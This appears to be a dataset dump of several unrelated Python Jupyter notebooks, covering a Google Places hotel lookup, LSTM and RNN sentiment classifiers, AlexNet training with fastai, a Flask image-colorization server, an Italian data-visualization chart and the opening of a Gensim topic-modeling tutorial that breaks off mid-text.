code
stringlengths
38
801k
repo_path
stringlengths
6
263
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: PythonData # language: python # name: pythondata # --- # + # Dependencies and Setup import requests import gmaps # Import API key from config import g_key # + # Set the parameters to search for a hotel in Paris. params = { "radius": 5000, "types": "lodging", "key": g_key, "location": "48.8566, 2.3522"} # Use base URL to search for hotels in Paris. base_url = "https://maps.googleapis.com/maps/api/place/nearbysearch/json" # Make request and get the JSON data from the search. hotels = requests.get(base_url, params=params).json() hotels
Cleanup/Google_Nearby_Search.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- from keras.preprocessing import sequence from keras.preprocessing import text from keras.preprocessing.text import Tokenizer from nltk.stem import PorterStemmer import numpy as np from keras.models import Sequential from keras.layers import Dense, Dropout, Activation from keras.layers import Embedding, LSTM from keras.preprocessing import text from sklearn.model_selection import train_test_split from tensorflow.keras.callbacks import TensorBoard from nltk.tokenize import word_tokenize import os import pandas as pd import string from bs4 import BeautifulSoup import re import random from keras.layers import Dropout import os df = pd.read_csv(r'C:\Users\Alexis\Documents\Data_Scraping\data\{}.csv'.format("twitter_sentiment_1"), encoding="Latin-1") df['target'] = df["target"].replace(4, 1) # replace labels of 4 with 1, easier for the computer to compute df.drop(["ids"," flag"," user"],axis=1,inplace=True) # drop unneeded columns updated_stopwords = ['i', 'me', 'my', 'myself', 'we', "weve", "wev", 'our', 'ours', 'ourselves', 'you', "you're", "you've", "you'll", "you'd", 'your', 'yours', 'yourself', 'yourselves', 'he', 'him', 'his', 'himself', 'she', "she's", 'her', 'hers', 'herself', 'it', "it's", 'its', 'itself', 'they', 'them', 'their', 'theirs', 'themselves', 'what', 'which', 'who', 'whom', 'this', 'that', "that'll", 'these', 'those', 'am', 'is', 'are', 'was', 'were', 'be', 'been', 'being', 'have', 'has', 'had', 'having', 'do', 'does', 'did', 'doing', 'a', 'an', 'the', 'and', 'but', 'if', 'or', 'because', 'as', 'until', 'while', 'of', 'at', 'by', 'for','with', 'about', 'against', 'between', 'into', 'through', 'during', 'before', 'after', 'above','below', 'to', 'from', 'up', 'down', 'in', 'out', 'on', 'off', 'over', 'under', 'again', 'further', 'then', 'once', 'here', 'there', 'when', 'where', 'why', 'how', 'all', 'any', 'both', 'each', 'few', 'more', 'most', 'other', 'some', 'such', 'no', 'nor', 'only', 'own', 'same', 'so', 'than', 'too', 's', 't', 'can', 'will', 'just', 'should', "should've", 'now', 'd','ll', 'm', 'o', 're', 've', 'y', 'ma', "youre", "youve", "youll", "youd", "shes", "its", "thatll", "hes", "im", "x", "well", "wel", "w", "i'm", "u", "b", "theyre", "they're", "ms", "mrs", "mr", "s"] # + def cleaning(data): porter = PorterStemmer() text_df = data[" text"] cleaned_tweets_list = [] for text in text_df: html_decoded = BeautifulSoup(text, "lxml")# html decoding html_decoded = html_decoded.get_text() # gets the text from the decoded html try: html_decoded = html_decoded.decode("utf-8-sig") # decoded using utf-8-sig no_utf = html_decoded.replace(u"\ufffd", " ") # removes UTF-8 BOM except: no_utf = html_decoded no_utf = no_utf.encode('utf8').decode('utf8') string_no_tags = re.sub(r"@[A-Za-z0-9-_]+"," ", no_utf) # removes tags no_urls = re.sub(r"http\S+", " ", string_no_tags) # remove urls no_numbers = re.sub(r"\d+", " ", no_urls) # remove numbers no_hashtags = re.sub(r"#[A-Za-z0-9]+"," ",no_numbers) # removes hashtags and anything following it no_hashtags = [word.lower() for word in no_hashtags.split()] removed_stopwords = [word for word in no_hashtags if word not in updated_stopwords] stem = "" for words in removed_stopwords: stem += "{} ".format(porter.stem(words)) duplicates_deleted = re.sub('\s+', ' ', stem).strip() # all spaces are converted to a single spac # removes duplicate characters duplicates_deleted = "" check = "" counter = 0 for word in removed_stopwords: for character in word: counter += 1 if character != check: check = character duplicates_deleted += "{}".format(character) else: continue if len(word) == counter: duplicates_deleted += "{}".format(" ") counter = 0 check = "" duplicates_deleted = duplicates_deleted.replace(".", " ") no_punctuation = "".join([char.lower() for char in duplicates_deleted if char not in string.punctuation]) tweets = no_punctuation.lower() # turn everything lowercase single_spaced = re.sub('\s+', ' ', no_punctuation).strip() single_spaced = single_spaced.split(" ") second_removed_stopwords = [word for word in single_spaced if word not in updated_stopwords] cleaned_tweets = "" for words in second_removed_stopwords: cleaned_tweets += "{} ".format(porter.stem(words)) cleaned_tweets_list.append(cleaned_tweets) # add each list to tweet dict_cleaned = {"text": cleaned_tweets_list} # create dictionary for dataframe structure cleaned_dataframe = pd.DataFrame(dict_cleaned) # creates the dataframe return cleaned_dataframe cleaned_df = cleaning(df) # + def combine(cleaned_df, old_df): targetList = [] dateList = [] textList = [] for f in old_df[" date"]: dateList.append(f) for f in old_df["target"]: targetList.append(f) for f in cleaned_df["text"]: textList.append(f) merged_df = pd.DataFrame({"date": dateList, "target": targetList,"text": textList}) return merged_df merged_df = combine(cleaned_df, df) # - for index, row in merged_df.iterrows(): if row["text"] == "": merged_df.drop(index, inplace=True) elif row["text"] == " ": merged_df.drop(index, inplace=True) elif row["text"] == " ": merged_df.drop(index, inplace=True) if "�" in row["text"]: merged_df.drop(index, inplace=True) elif "à" in row["text"]: merged_df.drop(index, inplace=True) elif "¥" in row["text"]: merged_df.drop(index, inplace=True) elif "ð" in row["text"]: merged_df.drop(index, inplace=True) elif "ñ" in row["text"]: merged_df.drop(index, inplace=True) elif "è" in row["text"]: merged_df.drop(index, inplace=True) elif "å" in row["text"]: merged_df.drop(index, inplace=True) elif "ç" in row["text"]: merged_df.drop(index, inplace=True) elif "â" in row["text"]: merged_df.drop(index, inplace=True) elif "º¥" in row["text"]: merged_df.drop(index, inplace=True) elif "ë" in row["text"]: merged_df.drop(index, inplace=True) elif "í" in row["text"]: merged_df.drop(index, inplace=True) elif "£" in row["text"]: merged_df.drop(index, inplace=True) elif "ø" in row["text"]: merged_df.drop(index, inplace=True) elif "§" in row["text"]: merged_df.drop(index, inplace=True) elif "ù" in row["text"]: merged_df.drop(index, inplace=True) elif "ã" in row["text"]: merged_df.drop(index, inplace=True) # + merged_df.to_csv("updated_merged_df_100.csv") merged_df = pd.read_csv("updated_merged_df_100.csv") # + # find the amount of distinct words found in the dataset full_text = [] for row in merged_df["text"]: row = row.split() full_text += row distinct_words = list(dict.fromkeys(full_text)) print("Found " + str(len(distinct_words)) + " unique words") # + X = merged_df["text"] y = merged_df["target"] X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20, random_state=4) tokenizer = Tokenizer(num_words=len(distinct_words)) tokenizer.fit_on_texts(X) word_index = tokenizer.word_index X_train = tokenizer.texts_to_sequences(X_train) X_test = tokenizer.texts_to_sequences(X_test) # + X_train = np.array(X_train) X_test = np.array(X_test) y_train = np.array(y_train) y_test = np.array(y_test) X_train = sequence.pad_sequences(X_train, maxlen=280) X_test = sequence.pad_sequences(X_test, maxlen=280) # + max_features = len(distinct_words) # unique vocab maxlen = 280 # the number of words per data point embedding_size = 32 # the dimensions that each word is converted to #tensorboard name = "LSTM 3 layers" tboard_log_dir = os.path.join("logs", name) tensorboard = TensorBoard(log_dir = tboard_log_dir) model = Sequential() model.add(Embedding(max_features, embedding_size, input_length=maxlen)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3, return_sequences=True)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3, return_sequences=True)) model.add(LSTM(64, dropout=0.3, recurrent_dropout=0.3)) model.add(Dense(1, activation='sigmoid')) model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy']) fitModel = model.fit(X_train, y_train, epochs = 30, batch_size = 126, validation_data=(X_test, y_test), verbose=1, callbacks=[tensorboard]) print(model.summary())
Sentiment Analysis LSTM.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- import requests import xml.etree.ElementTree as ET # The URL https://www.w3schools.com/xml/simple.xml links to a restaurant menu in XML format # # - Using `requests` fetch the data to the notebook # - Parse the XML data using element tree # - How many food items are there? # - What is the price of `Strawberry Belgian Waffles`? # - List the names of food items with less than 700 calories
27-problem-begin_apis_xml_xpath_xquery.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + import tensorflow as tf from flask import Flask, render_template, request,url_for,redirect from werkzeug.utils import secure_filename from tensorflow.keras.models import Sequential,load_model from tensorflow.keras.preprocessing.image import ImageDataGenerator, array_to_img, img_to_array, load_img from skimage.color import rgb2lab, lab2rgb, rgb2gray, xyz2lab from skimage.io import imsave import numpy as np import os import random from tensorflow.keras.layers import Conv2D, UpSampling2D, InputLayer, Conv2DTranspose from tensorflow.keras.layers import Activation, Dense, Dropout, Flatten # + import time app = Flask(__name__) @app.route('/') def main(): return render_template('index.html') @app.route('/uploader', methods = ['GET', 'POST']) def upload_file(): f = request.files['pic'] print(f.filename) f.save(secure_filename(f.filename)) model = Sequential() model.add(InputLayer(input_shape=(None, None, 1))) model.add(Conv2D(8, (3, 3), activation='relu', padding='same', strides=2)) model.add(Conv2D(8, (3, 3), activation='relu', padding='same')) model.add(Conv2D(16, (3, 3), activation='relu', padding='same')) model.add(Conv2D(16, (3, 3), activation='relu', padding='same', strides=2)) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(Conv2D(32, (3, 3), activation='relu', padding='same', strides=2)) model.add(UpSampling2D((2, 2))) model.add(Conv2D(32, (3, 3), activation='relu', padding='same')) model.add(UpSampling2D((2, 2))) model.add(Conv2D(16, (3, 3), activation='relu', padding='same')) model.add(UpSampling2D((2, 2))) model.add(Conv2D(2, (3, 3), activation='tanh', padding='same')) model.compile(optimizer='rmsprop',loss='mse') #model = load_model('Grey2colormodel.h5') path = secure_filename(f.filename) image = img_to_array(load_img(path, target_size=(400, 400))) image = np.array(image, dtype=float) X = rgb2lab(1.0/255*image)[:,:,0] Y = rgb2lab(1.0/255*image)[:,:,1:] Y /= 128 X = X.reshape(1, 400, 400, 1) Y = Y.reshape(1, 400, 400, 2) model.fit(x=X, y=Y,batch_size=1,epochs=0) model.load_weights('Grey2colormodel.h5') print(model.evaluate(X, Y, batch_size=1)) output = model.predict(X) output *= 128 # Output colorizations cur = np.zeros((400, 400, 3)) cur[:,:,0] = X[0][:,:,0] cur[:,:,1:] = output[0] base="static//" out_result_path="img_result"+str(time.time())+".png" out_grey_path="img_gray_version"+str(time.time())+".png" imsave(base+out_result_path, lab2rgb(cur)) imsave(base+out_grey_path, rgb2gray(lab2rgb(cur))) return render_template('output.html',p1=base+out_grey_path,p2=base+out_result_path) if __name__ == '__main__': app.run() # - # !pwd
Grey2colorPythonServer.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # RNN Sentiment Classifier # In this notebook, we use an RNN to classify IMDB movie reviews by their sentiment. # #### Load dependencies import tensorflow from tensorflow.keras.datasets import imdb from tensorflow.keras.preprocessing.sequence import pad_sequences from tensorflow.keras.models import Sequential from tensorflow.keras.layers import Dense, Dropout, Embedding, SpatialDropout1D from tensorflow.keras.layers import SimpleRNN # new! from tensorflow.keras.callbacks import ModelCheckpoint import os from sklearn.metrics import roc_auc_score import matplotlib.pyplot as plt # #### Set hyperparameters # + # output directory name: output_dir = 'model_output/rnn' # training: epochs = 16 # way more! batch_size = 128 # vector-space embedding: n_dim = 64 n_unique_words = 10000 max_review_length = 100 # lowered due to vanishing gradient over time pad_type = trunc_type = 'pre' drop_embed = 0.2 # RNN layer architecture: n_rnn = 256 drop_rnn = 0.2 # dense layer architecture: # n_dense = 256 # dropout = 0.2 # - # #### Load data (x_train, y_train), (x_valid, y_valid) = imdb.load_data(num_words=n_unique_words) # removed n_words_to_skip # #### Preprocess data x_train = pad_sequences(x_train, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) x_valid = pad_sequences(x_valid, maxlen=max_review_length, padding=pad_type, truncating=trunc_type, value=0) # #### Design neural network architecture # + model = Sequential() # first hidden layer model.add(Embedding(n_unique_words, n_dim, input_length=max_review_length)) model.add(SpatialDropout1D(drop_embed)) # Second hidden layer model.add(SimpleRNN(n_rnn, dropout=drop_rnn)) # model.add(Dense(n_dense, activation='relu')) # typically don't see top dense layer in NLP like in # model.add(Dropout(dropout)) model.add(Dense(1, activation='sigmoid')) # - model.summary() # #### Configure model model.compile(loss='binary_crossentropy', optimizer='nadam', metrics=['accuracy']) modelcheckpoint = ModelCheckpoint(filepath=output_dir+"/weights.{epoch:02d}.hdf5") if not os.path.exists(output_dir): os.makedirs(output_dir) # #### Train! model.fit(x_train, y_train, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(x_valid, y_valid), callbacks=[modelcheckpoint]) # #### Evaluate model.load_weights(output_dir+"/weights.16.hdf5") y_hat = model.predict_proba(x_valid) plt.hist(y_hat) _ = plt.axvline(x=0.5, color='orange') "{:0.2f}".format(roc_auc_score(y_valid, y_hat)*100.0)
notebooks/rnn_sentiment_classifier.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # + [markdown] heading_collapsed=true # ## BoilerPlate command # + [markdown] hidden=true # It’s standard practice to start the notebook with the following three lines; they ensure that any edits to libraries you make are reloaded here automatically, and also that any charts or images displayed are shown in this notebook. # # # + hidden=true # %reload_ext autoreload # %autoreload 2 # %matplotlib inline # + [markdown] heading_collapsed=true # ## Importing Fast AI library # + [markdown] hidden=true # Let’s import fastai library and define our batch_size parameter to 128. Usually, image databases are enormous, so we need to feed these images into a GPU using batches, batch size 128 means that we will feed 128 images at once to update parameters of our deep learning model. If you are running out of memory because of smaller GPU RAM, you can reduce batch size to 64 or 32. # + hidden=true from fastai.vision import * from alexnet import * bs=128 # + [markdown] heading_collapsed=true # ## Downloading Dataset # + [markdown] hidden=true # Install Kaggle CLI and then use the following commdan to download Cats vs dog data - # + hidden=true # #!kaggle competitions download -c dogs-vs-cats # + [markdown] hidden=true # Extract the train zip folder in cats_dog folder. # + hidden=true path = Path('../data/cats_dog/') # + [markdown] heading_collapsed=true # ## Importing Data # + [markdown] hidden=true # Getting File names from the path # + hidden=true fnames = get_image_files(path) # + [markdown] hidden=true # Using ImageDataBunch API from fastAI to create our Dataset Loader. Note that we are taking classes from file names and extracting it with Regex functions. Also splitting the data in 80-20 ratio for out of sample validation. # + hidden=true data = ImageDataBunch.from_name_re(path, fnames, pat=r'([^/]+)\.\d+.jpg$', ds_tfms=get_transforms(), valid_pct=0.2, size=227, bs=bs ).normalize() # + [markdown] hidden=true # Looking at training(20,000 images) and validation dataset(5,000) images # + hidden=true data.train_ds # + hidden=true data.valid_ds # + [markdown] hidden=true # Looking at labels, number of labels and some sample images # + hidden=true print(data.classes) ## Prints class labels print(data.c) ## Prints number of classes data.show_batch(rows=4, figsize=(10,6), hide_axis=False) ## Show sample data # + [markdown] heading_collapsed=true # ## About the model # + [markdown] hidden=true # AlexNet famously won the 2012 ImageNet LSVRC-2012 competition by a large margin (15.3% VS 26.2% (second place) error rates). Here we have a look at the details of the neuron architecture from the related paper *ImageNet Classification with Deep Convolutional Neural Networks.* - # # | Layer Type | Output size | Filter Size / Stride | # |-------------|-------------|------------------------| # | Input Image | 227*227*3 | | # | CONV | 55*55*96 | 11*11/4*4*, K=96 | # | ACT | 55*55*96 | | # | BN | 55*55*96 | | # | POOL | 27*27*96 | 3*3/2*2 | # | DO | 27*27*96 | 0.25 | # | CONV | 27*27*256 | 5*5, K=256 | # | ACT | 27*27*256 | | # | BN | 27*27*256 | | # | POOL | 13*13*256 | 3*3/2*2 | # | DO | 13*13*256 | 0.25 | # | CONV | 13*13*384 | 3*3, K=384 | # | ACT | 13*13*384 | | # | BN | 13*13*384 | | # | CONV | 13*13*384 | 3*3, K=384 | # | ACT | 13*13*384 | | # | BN | 13*13*384 | | # | CONV | 13*13*256 | 3*3, K=256 | # | ACT | 13*13*256 | | # | BN | 13*13*256 | | # | POOL | 13*13*256 | 3*3/2*2 | # | DO | 6*6*256 | 0.25 | # | FC | 4096 | | # | ACT | 4096 | | # | BN | 4096 | | # | DO | 4096 | 0.5 | # | FC | 4096 | | # | ACT | 4096 | | # | BN | 4096 | | # | DO | 4096 | 0.5 | # | FC | 1000 | | # | SOFTMAX | 1000 | | # # Glossary- # - CONV -> Convolution layer # - ACT -> ReLU Activation # - BN -> Batch Normalization # - DO -> Dropout # - Pool -> Max pooling # - FC -> Fully connected layer # - # ## Training the model # We have defined our AlexNet model in alexnet.py file, now we need to train it. We can use FastAI's *Learner* function which makes it easier to leverage modern enhancement in optimization methods and many other neat tricks like 1-Cycle style training as highlighted in [<NAME>'s paper](https://arxiv.org/pdf/1803.09820.pdf) for faster convergence. Let's define our Learner class - ## Defining the learner alexnet_learner = Learner(data=data, model=ALEXNet(n_class=data.c), loss_func=nn.CrossEntropyLoss(), metrics=accuracy) alexnet_learner.model ## Finidng Ideal learning late alexnet_learner.lr_find() alexnet_learner.recorder.plot() alexnet_learner.fit_one_cycle(10, 1e-3) alexnet_learner.save('alexnet_stage-1') from sklearn.metrics import classification_report interp = ClassificationInterpretation.from_learner(alexnet_learner) print(classification_report(interp.y_true,interp.pred_class)) # As we can see we are reaching 94% accuracy just by using AlexNet as compared to 50% if we have picked classes at random. interp.plot_confusion_matrix(figsize=(4,4), dpi=60) # Let's see where our model is getting tricked. interp.plot_top_losses(9, figsize=(15,11))
9_Alexnet_fastai/AlexNet using FastAI.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # Librerie import os import pandas as pd import numpy as np import folium import matplotlib.pyplot as plt plt.style.use('ggplot') get_ipython().magic('pylab inline') # Cartelle Input/Output dir_df = os.path.join(os.path.abspath(''),'stg') dir_out = os.path.join(os.path.abspath(''),'output') df_g1_filename = r'df_g1.pkl' df_g1_fullpath = os.path.join(dir_df, df_g1_filename) df_g1 = pd.read_pickle(df_g1_fullpath) df_g1 = df_g1[df_g1['Territorio']!='Italia'] df_g1.head(2) df_g1['Popolazione residente'] = df_g1['Popolazione residente']/100000 # + style.use('fivethirtyeight') import matplotlib.ticker as mtick # Report G1 tp = df_g1.plot( x='Reddito pro capite', y='Speranza di vita alla nascita', s=df_g1['Popolazione residente'], kind='scatter', xlim=(0,75000), ylim=(0,90), legend = False, figsize = (6,4)) for i, txt in enumerate(df_g1.Territorio): tp.annotate(txt, (df_g1['Reddito pro capite'].iat[i]*1.070,df_g1['Speranza di vita alla nascita'].iat[i])) tp.plot() tp.tick_params(axis = 'both', which = 'major', labelsize = 10) # Generate a bolded horizontal line at y = 0 tp.axhline(y = 0, color = 'black', linewidth = 4, alpha = 0.7) tp.axvline(x = 500, color = 'black', linewidth = 0.8, alpha = 0.7) # Remove the label of the x-axis #tp.xaxis.label.set_visible(False) #tp.yaxis.label.set_visible(False) tp.set_ylabel('Speranza di vita alla nascita (anni)',fontsize=8) tp.set_xlabel('Reddito pro capite (euro)',fontsize=8) fmt = '{x:,.0f}' tick = mtick.StrMethodFormatter(fmt) tp.xaxis.set_major_formatter(tick) text = tp.text(x = -7000, y = -17, s = 'www.ildatomancante.it Fonte: Istat', fontsize = 10, color = '#f0f0f0', backgroundcolor = 'grey') text.set_url('http://www.ildatomancante.it/opendata/popolazione/799/la-grande-fuga-salute-ricchezza-e-origini-della-disuguaglianza-in-italia/') # Adding a title and a subtitle Reddito e aspettativa di vita tp.text(x = 1000, y = 106, s = "Reddito e aspettativa di vita in Italia (2015)", fontsize = 14, weight = 'bold', alpha = .75) tp.text(x = 1000, y = 96, s = '''Relazione tra l'aspettativa di vita e il reddito pro capite dei cittadini \nitaliani.''', fontsize = 10, alpha = .85) fig_prj = tp.get_figure() fig_prj.savefig(os.path.join(dir_out,'G1_Reddito_e_Aspettativa.png'), format='png', dpi=300,bbox_inches='tight') fig_prj.savefig(os.path.join(dir_out,'G1_Reddito_e_Aspettativa.svg'), format='svg', dpi=300,bbox_inches='tight') # + # df_g1.to_csv(os.path.join(dir_out,r'G1_Preston.csv'),header=True, index=False)
G1_data_visualization.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Topics – Easy Topic Modeling in Python # # The text mining technique **Topic Modeling** has become a popular statistical method for clustering documents. This [Jupyter notebook](http://jupyter.org/) introduces a step-by-step workflow, basically containing data preprocessing, the actual topic modeling using **latent Dirichlet allocation** (LDA), which learns the relationships between words, topics, and documents, as well as some interactive visualizations to explore the model. # # LDA, introduced in the context of text analysis in [2003](http://www.jmlr.org/papers/volume3/blei03a/blei03a.pdf), is an instance of a more general class of models called **mixed-membership models**. Involving a number of distributions and parameters, the topic model is typically performed using [Gibbs sampling](https://en.wikipedia.org/wiki/Gibbs_sampling) with conjugate priors and is purely based on word frequencies. # # There have been written numerous introductions to topic modeling for humanists (e.g. [this one](http://scottbot.net/topic-modeling-for-humanists-a-guided-tour/)), which provide another level of detail regarding its technical and epistemic properties. # # For this workflow, you will need a corpus (a set of texts) as plain text (`.txt`) or [TEI XML](http://www.tei-c.org/index.xml) (`.xml`). Using the `dariah_topics` package, you also have the ability to process the output of [DARIAH-DKPro-Wrapper](https://github.com/DARIAH-DE/DARIAH-DKPro-Wrapper), a command-line tool for *natural language processing*. # # Topic modeling works best with very large corpora. The [TextGrid Repository](https://textgridrep.org/) is a great place to start searching for text data. Anyway, to demonstrate the technique, we provide one small text collection in the folder `grenzboten_sample` containing 15 diary excerpts, as well as 15 war diary excerpts, which appeared in *Die Grenzboten*, a German newspaper of the late 19th and early 20th century. # # **Of course, you can work with your own corpus in this notebook.** # # We're relying on the LDA implementation by [<NAME>](https://radimrehurek.com/), called [Gensim](https://radimrehurek.com/project/gensim/), which is attractive because of its multi-core support. Aside from that, we provide two more Jupyter notebooks: # # * [IntroducingMallet](IntroducingMallet.ipynb), using LDA by [MALLET](http://mallet.cs.umass.edu/topics.php), which is known to be very robust. # * [IntroducingLda](IntroducingLda.ipynb), using LDA by [lda](http://pythonhosted.org/lda/index.html), which is lightweight. # # For more information in general, have a look at the [documentation](http://dev.digital-humanities.de/ci/job/DARIAH-Topics/doclinks/1/). # ## First step: Installing dependencies # # To work within this Jupyter notebook, you will have to import the `dariah_topics` library. As you do, `dariah_topics` also imports a couple of external libraries, which have to be installed first. `pip` is the preferred installer program in Python. Starting with Python 3.4, it is included by default with the Python binary installers. If you are interested in `pip`, have a look at [this website](https://docs.python.org/3/installing/index.html). # # To install the `dariah_topics` library with all dependencies, open your commandline, go with `cd` to the folder `Topics` and run: # # ``` # pip install -r requirements.txt # ``` # # Alternatively, you can do: # # ``` # python setup.py install # ``` # # If you get any errors or are not able to install *all* dependencies properly, try [Stack Overflow](https://stackoverflow.com/questions/tagged/pip) for troubleshooting or create a new issue on our [GitHub page](https://github.com/DARIAH-DE/Topics). # # **Important**: If you are on macOS or Linux, you will have to use `pip3` and `python3`. # ### Some final words # As you probably already know, code has to be written in the grey cells. You execute a cell by clicking the **Run**-button (or **Ctrl + Enter**). If you want to run all cells of the notebook at once, click **Cell > Run All** or **Kernel > Restart & Run All** respectively, if you want to restart the Python kernel first. On the left side of an (unexecuted) cell stands `In [ ]:`. The empty bracket means, that the cell hasn't been executed yet. By clicking **Run**, a star appears in the brackets (`In [*]:`), which means the process is running. In most cases, you won't see that star, because your computer is faster than your eyes. You can execute only one cell at once, all following executions will be in the waiting line. If the process of a cell is done, a number appears in the brackets (`In [1]:`). # ## Starting with topic modeling! # # Execute the following cell to import modules from the `dariah_topics` library. from cophi_toolbox import preprocessing from dariah_topics import postprocessing from dariah_topics import visualization # Furthermore, we will need some additional functions from external libraries. from gensim.models import LdaMulticore import metadata_toolbox.utils as metadata import pandas as pd from pathlib import Path # Let's not pay heed to any warnings right now and execute the following cell. import warnings warnings.filterwarnings("ignore") # ## 1. Preprocessing # ### 1.1. Reading a corpus of documents # #### Defining the path to the corpus folder # # In the present example code, we are using the 30 diary excerpts from the folder `grenzboten`. To use your own corpus, change the path accordingly. path_to_corpus = Path('data', 'grenzboten_sample') # #### Specifying the pattern of filenames for metadata extraction # # You have the ability to extract metadata from the filenames. For instance, if your textfiles look like: # # ``` # goethe_1816_stella.txt # ``` # # the pattern would look like this: # # ``` # {author}_{year}_{title} # ``` # # So, let's try this for the example corpus. pattern = '{author}_{year}_{title}' # #### Accessing file paths and metadata # We begin by creating a list of all the documents in the folder specified above. That list will tell the function `preprocessing.read_files` (see below) which text documents to read. Furthermore, based on filenames we can create some metadata, e.g. author and title. meta = pd.concat([metadata.fname2metadata(str(path), pattern=pattern) for path in path_to_corpus.glob('*.txt')]) meta[:5] # by adding '[:5]' to the variable, only the first 5 elements will be printed # #### Read listed documents from folder corpus = list(preprocessing.read_files(meta.index)) corpus[0][:255] # printing the first 255 characters of the first document # Your `corpus` contains as much elements (`documents`) as texts in your corpus are. Each element of `corpus` is a list containing exactly one element, the text itself as one single string including all whitespaces and punctuations: # # ``` # [['This is the content of your first document.'], # ['This is the content of your second document.'], # ... # ['This is the content of your last document.']] # ``` # ### 1.3. Tokenize corpus # Now, your `documents` in `corpus` will be tokenized. Tokenization is the task of cutting a stream of characters into linguistic units, simply words or, more precisely, tokens. The tokenize function `dariah_topics` provides is a simple Unicode tokenizer. Depending on the corpus, it might be useful to use an external tokenizer function, or even develop your own, since its efficiency varies with language, epoch and text type. tokenized_corpus = [list(preprocessing.tokenize(document)) for document in corpus] # At this point, each `document` is represented by a list of separate token strings. As above, have a look at the first document (which has the index `0` as Python starts counting at 0) and show its first 14 words/tokens (that have the indices `0:13` accordingly). tokenized_corpus[0][0:13] # ### 1.4. Create a document-term matrix # # The LDA topic model is based on a bag-of-words model of the corpus. To improve performance in large corpora, actual words and document titels are replaced by indices in the actual bag-of-words model. # # **Because of Gensim's API, you will have to choose the large corpus model.** document_term_matrix, document_ids, type_ids = preprocessing.create_document_term_matrix(tokenized_corpus, meta['title'], large_corpus=True) # ### 1.5. Feature removal # # *Stopwords* (also known as *most frequent tokens*) and *hapax legomena* are harmful for LDA and have to be removed from the corpus or the document-term matrix respectively. In this example, the 50 most frequent tokens will be categorized as stopwords. # # **Hint**: Be careful with removing most frequent tokens, you might remove tokens quite important for LDA. Anyway, to gain better results, it is highly recommended to use an external stopwords list. # # In this notebook, we combine the 50 most frequent tokens, hapax legomena and an external stopwordslist. # #### List the 100 most frequent words stopwords = preprocessing.list_mfw(document_term_matrix, most_frequent_tokens=100, type_ids=type_ids) # These are the five most frequent words: stopwords[:5] # #### List hapax legomena hapax_legomena = preprocessing.find_hapax_legomena(document_term_matrix, type_ids) print("Total number of types in corpus:", len(type_ids)) print("Total number of hapax legomena:", len(hapax_legomena)) # #### Optional: Use external stopwordlist path_to_stopwordlist = Path('data', 'stopwords', 'de.txt') external_stopwords = [line.strip() for line in path_to_stopwordlist.open('r', encoding='utf-8')] # #### Combine lists and remove content from `document_term_matrix` features = stopwords + hapax_legomena + external_stopwords document_term_matrix = preprocessing.remove_features(features, document_term_matrix=document_term_matrix, type_ids=type_ids) # ### 1.6. Creating specific Gensim corpus format # # With the function below, you can create the specific Gensim corpus format. gensim_corpus = postprocessing.doc2bow(document_term_matrix) # ## 2. Model creation # # The actual topic modeling is done with external state-of-the-art LDA implementations. In this example, we are relying on the open-source toolkit **Gensim** which was used and cited in over 400 commercial and academic applications since 2008. # ### 2.1. Rearrange dictionaries doc2id = {value : key for key, value in document_ids.items()} type2id = {value : key for key, value in type_ids.items()} # ### 2.2. Generate LDA model # # We use the class `LDA` from the library `lda` (which is basically not the same, because Python is case sensitive) to generate a LDA topic model. To instance a `LDA` object, there have to be specified a couple of parameters. # # But first, if you are curious about any library, module, class or function, try `help()`. This can be very useful, because (at least in a well documented library) explanations of use and parameters will be printed. We're interested in the class `LDA` of the library `lda`, so let's try: # # ``` # help(LdaMulticore) # ``` # # This will print something like this (in fact even more): # # ``` # Help on class LdaMulticore in module gensim.models.ldamulticore: # # class LdaMulticore(gensim.models.ldamodel.LdaModel) # | The constructor estimates Latent Dirichlet Allocation model parameters based # | on a training corpus: # | # | >>> lda = LdaMulticore(corpus, num_topics=10) # | # | You can then infer topic distributions on new, unseen documents, with # | # | >>> doc_lda = lda[doc_bow] # | # | The model can be updated (trained) with new documents via # | # | >>> lda.update(other_corpus) # | # | Methods defined here: # | # | __init__(parameter ...) # | If given, start training from the iterable `corpus` straight away. If not given, # | the model is left untrained (presumably because you want to call `update()` manually). # | # | `num_topics` is the number of requested latent topics to be extracted from # | the training corpus. # | # | `id2word` is a mapping from word ids (integers) to words (strings). It is # | used to determine the vocabulary size, as well as for debugging and topic # | printing. # | # | `workers` is the number of extra processes to use for parallelization. Uses # | all available cores by default: `workers=cpu_count()-1`. **Note**: for # | hyper-threaded CPUs, `cpu_count()` returns a useless number -- set `workers` # | directly to the number of your **real** cores (not hyperthreads) minus one, # | for optimal performance. # | # | If `batch` is not set, perform online training by updating the model once # | every `workers * chunksize` documents (online training). Otherwise, # | run batch LDA, updating model only once at the end of each full corpus pass. # | # | `alpha` and `eta` are hyperparameters that affect sparsity of the document-topic # | (theta) and topic-word (lambda) distributions. Both 